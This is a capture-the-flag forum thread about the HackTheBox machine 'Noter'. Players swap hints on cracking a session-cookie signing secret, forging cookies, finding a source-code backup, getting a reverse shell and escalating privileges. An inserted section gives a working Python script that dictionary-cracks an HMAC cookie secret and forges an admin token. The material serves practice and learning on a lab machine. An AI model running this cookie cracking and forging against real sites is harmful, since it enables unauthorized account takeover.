Official Noter Discussion

To forge that… we need a secret key, right? …

It is possible to crack the key using the same tool.

RTFM is key whenever you are able to log in as a different user!

oh well … I was using the wrong tool.
I guess I really needed to do better research about the backend in use and not just guess by looking at the co****.

Can’t think of anything to add to rocksxebec’s overview.

I did not expect the privesc and had to use a time machine to get the data I needed.

Thanks kavigihan for the fun box.

No space left on device

Feels bad man

So it is NOT what I think the cookie is?

Your first guess about the cookie is probably wrong.
You really need to know what framework is in use.
Not sure if there is a tool that could show you exactly what it is.
I myself looked at everything I got from the server and guessed the right one. (Maybe I was just lucky, or maybe there don't exist that many for the language that is used.)
After you have the name of that framework, you would need to search for a specific tool for “forging”.

But currently I'm stuck again because of server issues.
First, the flag inside user.txt was not accepted (I guess you are not supposed to crack the hash inside).
And at the moment the site I need is just loading infinitely…

Edit:
Great… now I got root and root.txt is not working either.
I hate it…

Edit again:
Solved my “incorrect flag” problem by choosing another VPN server.
For some reason the top-right icon on HackTheBox was also red, not showing that I was connected.
I guess I was just using old ovpn files… still wonder why I was able to connect to the Noter server.
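The posts above keep coming back to the same two steps: crack the secret that signs the session cookie, then forge a cookie for a different user. The following is an added illustration and is not code from this thread, from the box, or from whatever tool the posters used; it assumes a generic HMAC-SHA256 signed token of the form `base64(json).base64(mac)` rather than the box's real framework, and the wordlist and the weak server secret are constructed for the demo. The point it shows is that the payload of a signed (not encrypted) cookie is readable by anyone, and that once the secret falls to an offline dictionary attack, the attacker can re-sign an arbitrary payload that the server will accept.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed wordlist for the demo; a real run would use rockyou or similar.
WORDLIST = ["password", "secret", "letmein", "noter", "supersecret"]


def b64e(raw: bytes) -> str:
    """URL-safe base64 without padding, as signed-cookie libraries commonly emit it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64d(text: str) -> bytes:
    """Inverse of b64e; re-adds the stripped padding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign(payload: dict, secret: str) -> str:
    """Server side: serialize the payload and append an HMAC-SHA256 over it."""
    body = b64e(json.dumps(payload, sort_keys=True, separators=(",", ":")).encode())
    mac = hmac.new(secret.encode(), body.encode(), hashlib.sha256).digest()
    return f"{body}.{b64e(mac)}"


def verify(token: str, secret: str) -> Optional[dict]:
    """Server side: return the payload only if the MAC matches, else None."""
    try:
        body, mac = token.split(".", 1)
    except ValueError:
        return None
    expected = hmac.new(secret.encode(), body.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64d(mac)):
        return None
    return json.loads(b64d(body))


def decode_unverified(token: str) -> dict:
    """Attacker side: the body is only encoded, so it can be read without the secret."""
    return json.loads(b64d(token.split(".", 1)[0]))


def crack_secret(token: str, wordlist) -> Optional[str]:
    """Attacker side: offline dictionary attack.

    Re-sign the observed body with each candidate secret and compare against the
    observed MAC; no requests to the server are needed, so rate limiting does not help.
    """
    body, mac = token.split(".", 1)
    target = b64d(mac)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), body.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def forge(token: str, secret: str, **changes) -> str:
    """Attacker side: keep the original claims, override some, re-sign with the cracked secret."""
    payload = decode_unverified(token)
    payload.update(changes)
    return sign(payload, secret)


def demo():
    """Full chain on constructed data: observe a cookie, crack the secret, forge a new one."""
    server_secret = "supersecret"  # constructed weak secret, not from the box
    observed = sign({"user": "alice", "role": "user"}, server_secret)
    cracked = crack_secret(observed, WORDLIST)
    forged = forge(observed, cracked, user="admin", role="admin")
    # The server accepts the forged cookie because the MAC is valid under its own secret.
    return cracked, verify(forged, server_secret)


if __name__ == "__main__":
    print(demo())
```

The defensive reading is the same as the offensive one: a signed cookie is only as strong as the secret behind it, so a dictionary word or a framework default is equivalent to no signature at all.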

Yesterday the machine's / was 100% full; today it is at 60%, so it seems that was not intentional.

@gnt48 you probably need the source code to continue.
Just ask yourself what lazy person (yes, that contradiction is intentional) might have a backup of it… and where.

Any hint on the privesc? Somebody above said it is basic privesc; maybe I'm missing something obvious…

A major hint on how you might approach the privilege escalation is subtly hidden away in the source code.

Hey, can someone help me a little bit with the user flag? :smiley:

Thank you! You are totally right, but for those who never struggled with it before, I guess the key is to do a good p****** enumeration and to see what they can do with that.
I think that thing in the source code is much easier/more visible than the second part :stuck_out_tongue:

You can read a lot of hints in this thread:

  • s***** c*****
  • back-end technology (what is the programming language? Can you guess what is behind it?)
  • “forge / forging” (once you figure out the previous question, it shouldn't be difficult for you to find something on Google to resolve this step)

Look at the source code and try running parts of it locally to see how it behaves. Checking how the code behaves should be enough to give you an idea of how to pop a shell.

A little hint, I guess: both files are valid.

Regarding that function: think about nesting.

The rev shell is standard, but understanding how the back end will deal with it is key here.

I'm in the process of finding a real user to log in as. Someone says you can guess from the public pages, but where?
I found a user someone has created, and I'm trying to brute-force others. It's slow, and I don't think it's the right way. I already have the tool to forge the token.

Any hint please?

You can work around the issues with [bad gas] by using a [greek mythological monster] cure!

Having a lot of problem with root flag… Look like I’m getting a lot of error. Everytime I try the same path, sometimes work, then say “this don’t exist” so I try to recreate it and now I get another error. Then If I try it again I can reach some point and then… error again… stuff just disappear a lot of time… I’m really stucked and I don’t know if that is wrong or if there is something wrong with the machine.